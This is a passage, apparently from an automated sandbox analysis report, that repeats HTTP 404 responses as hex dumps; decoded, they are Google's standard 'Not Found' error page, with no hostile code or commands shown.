72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:13:42 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:13:44 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:13:46 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:13:48 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:13:50 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:13:52 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:13:54 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 